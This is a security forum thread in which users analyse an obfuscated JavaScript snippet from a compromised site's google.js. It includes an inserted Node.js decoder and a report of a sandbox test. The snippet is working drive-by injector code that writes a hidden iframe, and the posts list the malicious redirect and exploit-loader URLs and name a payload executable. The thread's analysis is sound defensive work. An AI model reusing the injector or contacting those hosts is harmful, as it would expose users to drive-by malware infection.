What does this code do?

General discussion about the NoScript extension for Firefox
luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

Post by luntrus »

Hi forum friends,

Found this piece of code, here: http://dreamonisland.com/js/google.js (WOT flags the site as quarantined)

function IO1IO00ll1lOIll1() {
	var llIO0O1llll0lOOI = 'Bie peq eeexe, letc. Kefeee vbj cieoecec egbkbx bxese xesesdzefetd zet bweiet ecbxep; eibwe verepbheseteqexed. Eke c. Cickebe pese ceobjcibu cic keoetepereoe cbjcibu cickeqeeexe leteueje ee sete. Ebj cib ucibgbibxepeqeeexeletbg.';
	return llIO0O1llll0lOOI.toLowerCase();
}
function OI1OlO1lI01101OO(l101I10I0lI0O0I1, O0llO0l01011OllI) {
	return l101I10I0lI0O0I1.charCodeAt(O0llO0l01011OllI);
}
function Olll00O1001O10l1(OI1OI0I01lOll1Ol) {
	return String.fromCharCode(OI1OI0I01lOll1Ol);
}
function IOI1O1IOO00I0l01(llI00OIOII1IIO00) {
	document.write(llI00OIOII1IIO00);
}
var lOO10I1lIlO11OI1 = IO1IO00ll1lOIll1();
var Ol0IO1O010OOO1lO = true;
var l1IIIllOIIIlI0I1 = 0;
var Ol010IOOI0011lIO = "";
var I11010Oll1lO1Ol0 = 30;
var I10IOII1lOI00O0O = 67 + I11010Oll1lO1Ol0;
var lI00I0Ol0l10010I = -4 + I11010Oll1lO1Ol0;
for (var O11OOI1OIIOI0IOI = 0; O11OOI1OIIOI0IOI < lOO10I1lIlO11OI1.length; O11OOI1OIIOI0IOI++) {
	IlO1O110Ill1001l = OI1OlO1lI01101OO(lOO10I1lIlO11OI1, O11OOI1OIIOI0IOI) - I10IOII1lOI00O0O;
	if (IlO1O110Ill1001l >= 0 && IlO1O110Ill1001l <= (lI00I0Ol0l10010I - 1)) {
		if (Ol0IO1O010OOO1lO) {
			l1IIIllOIIIlI0I1 = IlO1O110Ill1001l * lI00I0Ol0l10010I;
		} else {
			l1IIIllOIIIlI0I1 += IlO1O110Ill1001l;
			Ol010IOOI0011lIO += Olll00O1001O10l1(l1IIIllOIIIlI0I1 ^ I11010Oll1lO1Ol0);
			l1IIIllOIIIlI0I1 = 0;
		}
		Ol0IO1O010OOO1lO = !Ol0IO1O010OOO1lO;
	}
}
IOI1O1IOO00I0l01(Ol010IOOI0011lIO);  
What does it actually do, and is it suspicious? This could be another reason to have NS block it.
Analyzing here I can have a good guess at what it does: http://jsunpack.jeek.org/dec/go?report= ... de541ed715
going here: hxtp://daddyseye.net/in.cgi?default and then here: http://www.itmakemehappy*com/666/load0x1.php?spl=mdac&fh=
a dangerous site, re: http://www.malwaredomainlist.com/mdl.ph ... ehappy.com
Consider also: http://wepawet.iseclab.org/view.php?has ... 64&type=js

luntrus
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.16) Gecko/2010010414 Firefox/3.0.16 Flock/2.5.6
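
Added example, not part of either post: a static decoder for the scheme in the snippet above, meant to be run under Node.js so the hidden markup is recovered as a string instead of being passed to document.write. The constants and the encoded string are copied from the post; the names decode, defang and hiddenIframes are hypothetical helpers introduced here.

```javascript
// Added example (not from the thread): decode the string statically, never render it.
// ENCODED is the literal from the posted google.js, copied unchanged.
const ENCODED = 'Bie peq eeexe, letc. Kefeee vbj cieoecec egbkbx bxese xesesdzefetd zet bweiet ecbxep; eibwe verepbheseteqexed. Eke c. Cickebe pese ceobjcibu cic keoetepereoe cbjcibu cickeqeeexe leteueje ee sete. Ebj cib ucibgbibxepeqeeexeletbg.';

const KEY = 30;          // I11010Oll1lO1Ol0 in the post
const BASE = 67 + KEY;   // 97, the char code of 'a'
const RADIX = -4 + KEY;  // 26, so each letter is one base-26 digit

// Lower-case the input, keep only a-z (spaces, punctuation and capitals are
// camouflage), read the letters in pairs as hi*26 + lo, then XOR with KEY.
function decode(encoded) {
  const digits = [];
  for (const ch of encoded.toLowerCase()) {
    const v = ch.charCodeAt(0) - BASE;
    if (v >= 0 && v < RADIX) digits.push(v);
  }
  let out = '';
  // A trailing unpaired letter is dropped, as in the original loop.
  for (let i = 0; i + 1 < digits.length; i += 2) {
    out += String.fromCharCode((digits[i] * RADIX + digits[i + 1]) ^ KEY);
  }
  return out;
}

// Defang URLs before pasting the result into notes or a ticket.
function defang(text) {
  return text.replace(/http/gi, 'hxxp').replace(/\./g, '[.]');
}

// Triage check: list iframe tags that are sized 0x0, i.e. invisible to the user.
function hiddenIframes(html) {
  const tags = html.match(/<iframe\b[^>]*>/gi) || [];
  return tags.filter((t) =>
    /\bwidth\s*=\s*["']?0\b/i.test(t) && /\bheight\s*=\s*["']?0\b/i.test(t));
}

const decoded = decode(ENCODED);
console.log(defang(decoded));
console.log('hidden iframes:', hiddenIframes(decoded).length);
```

The decoded string is a zero-size iframe whose source matches the first redirect listed in the post, which is why a script blocker stopping google.js also stops the rest of the chain.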
Alan Baxter
Ambassador
Posts: 1586
Joined: Fri Mar 20, 2009 4:47 am
Location: Colorado, USA

Re: What does this code do?

Post by Alan Baxter »

luntrus wrote: http://www.itmakemehappy*com/666/load0x1.php?spl=mdac&fh=
a dangerous site,
Testing in a sandbox -- of course -- Avast blocked the execution of the payload, loadx1.exe. Before that happened I had to click through a Firefox dialog asking me if I wanted to download it, open the exe by double-clicking on it, click through another Firefox dialog warning me that "loadx1.exe" is an executable file. Executable files may contain viruses or other malicious code that could harm your computer. Use caution when opening this file. Are you sure you want to launch "loadx1.exe"?, and finally click through a Security Warning dialog from Windows.

Even if it were a zero-day exploit that Avast didn't know about, I would have been protected by my unwillingness to run programs I haven't asked for.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4